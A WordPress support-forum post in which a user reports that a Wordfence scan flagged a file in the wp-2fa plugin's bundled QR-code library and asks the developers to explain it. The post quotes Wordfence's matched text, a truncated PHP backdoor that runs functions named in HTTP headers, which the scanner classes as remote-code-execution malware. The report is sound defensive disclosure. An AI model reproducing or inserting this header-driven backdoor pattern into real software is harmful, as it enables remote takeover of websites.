Wordfence flagging malicious files in your plugin
-
Hello,
Just done a scan with Wordfence and it’s picked up these files which seem to reside in your plugin, please can you clarify what these are:
- Filename:?/html/wp-content/plugins/wp-2fa/vendor/bacon/bacon-qr-code/test/Integration/old_con.php
- File Type: Not a core, theme, or plugin file from www.ads-software.com.
- Details:?This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is:?<?php\x0a$_HEADERS = getallheaders();\x0d\x0aif (isset($_HEADERS[‘If-Unmodified-Since’])) {\x0d\x0a?$system = $_HEADERS[‘If-Unmodified-Since’](”, $_HEADERS[‘X-Dns-Prefetch-Control’]($_HEADERS[‘Clear-Site-Data’])…
The issue type is:?Backdoor:PHP/rce.if-modified.9373
Description:?Injected malware code used for remote code execution and site takeovers
Thanks
Rob
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘Wordfence flagging malicious files in your plugin’ is closed to new replies.